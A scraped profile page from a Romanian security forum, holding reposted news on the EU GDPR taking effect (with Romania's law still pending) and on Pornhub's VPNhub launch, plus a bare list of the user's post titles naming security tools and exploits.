Noul Regulament UE privind prelucrarea datelor cu caracter personal și libera circulație a acestor date a intrat în vigoare de vineri în toate statele Uniunii Europene, inclusiv în România. Noul regulament obligă companiile care îşi desfăşoară activitatea în Uniunea Europeană să ceară și să primească acordul utilizatorilor pentru a le colecta și prelucra datele. În cazul unei scurgeri de informaţii, companiile sunt obligate să îşi anunţe utilizatorii/ clienţii afectaţi şi autorităţile în maxim 72 de ore. Nerespectarea lui poate duce la amendarea unei companii cu până la 20 de milioane de euro sau 4% din cifra de afaceri. În România, însă, legislația necesară a fost adoptată abia săptămâna aceasta de Parlament și se află la promulgare. Proiectul a stat și două zile la secretariatele generale ale celor două camere parlamentare, în vederea unei eventuale exercitări a dreptului de sesizare a Curții Constituționale. Prin urmare, cel mai probabil, chiar în ziua intrării în vigoare a GDPR, legea poate fi trimisă spre promulgare președintelui. Dacă va fi promulgată de Klaus Iohannis, legea va intra în vigoare la 3 zile de la publicarea în Monitorul Oficial. Via b1.ro

May 25, 2018

Pornhub launches VPNhub – a free and unlimited VPN service

Fi8sVrs posted a topic in Stiri securitate

PornHub wants you to keep your porn viewing activities private, and it is ready to help you out with its all-new VPN service. Yes, you heard that right. Adult entertainment giant PornHub has launched its very own VPN service today with "free and unlimited bandwidth" to help you keep prying eyes away from your browsing activity. Dubbed VPNhub, the VPN service by PornHub is available for both mobile as well as desktop platform, including Android, iOS, MacOS, and Windows. VPN, or Virtual Private Network, allows users to transmit data anonymously, avoids ISP-level website blocking or tracking and keeps your browsing activity private by encrypting your data, even when you are on public Wi-Fi connections. VPNhub promises never to store, collect, sell, or share your personal information with any third parties for their marketing, advertising or research purposes. However, in its privacy policy under the heading, "How We Use Your Information," the company says it can sell "aggregate or non-personally identifiable information with non-affiliated third parties for advertising, marketing or research purposes." Since some government, including that of United Kingdom, are regulating adult content online, launching a VPN service by Pornhub makes sense. VPNhub is available in countries across the globe except for Burma/Myanmar, Cuba, Iran, North Korea, Sudan, and Syria, due to the ban imposed by the U.S. government. While mobile users (both iOS and Android) can download and use the VPNhub app for free, desktop users (MacOS and Windows) have to purchase a premium account. You can also upgrade your free account to a premium subscription for $13 a month or $90 for a full year, which eliminates ads, provides faster connection speeds, and opens up "servers from a wide range of countries." You can give premium VPNhub a try by using its use 7-day free trial. Via thehackernews.com

Sign In

Fi8sVrs

Posts

Joined

Days Won

Content Type

Profiles

Forums

Everything posted by Fi8sVrs

FBI issues alert over two new malware linked to Hidden Cobra hackers

Facebook Clone Script 1.0.5 - 'search' SQL Injection

Malware source code samples

Awesome Python Modules

Multitor - A tool that lets you create multiple TOR instances with a load-balancing.

ZenMate VPN Browser Extension Deanonymization & Hijacking Vulnerability (3.5 Million Affected Users)

New Firefox Release Will Stop Malicious Crypto Mining and Enhance Users’ Privacy

tapioca - CERT Tapioca for MITM network analysis

Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

SQLi Exploiter - Tool for exploiting SQL injection vulnerabilities that sqlmap can't find.

Linux Privilege Escalation using Misconfigured NFS

iOSRestrictionBruteForce - Crack iOS Restriction Passcodes with Python

Sublist3r

SMTP-Mailer

Terminator : Metasploit Payload Generator

Superfood 1.0 - Multiple Vulnerabilities

HTTPoxyScan - HTTPoxy Exploit Scanner

Impunere interval minim intre topicuri

salt-scanner - Linux vulnerability scanner based on Salt Open and Vulners audit API, with Slack notifications and JIRA integration

TalkTalk Router - WPS Exploit

Sandmap - Network and System Reconnaissance Tool

Aww Ship! Navigating the vulnerabilities and attack surface of the maritime industry John Sonnenschein

Windows Packer Project for Defenders: DARKSURGEON

Noul regulament pentru protecția datelor a intrat în vigoare în UE. În România, legea abia a fost votată de parlamentari

Pornhub launches VPNhub – a free and unlimited VPN service

Browse

Activity

Pages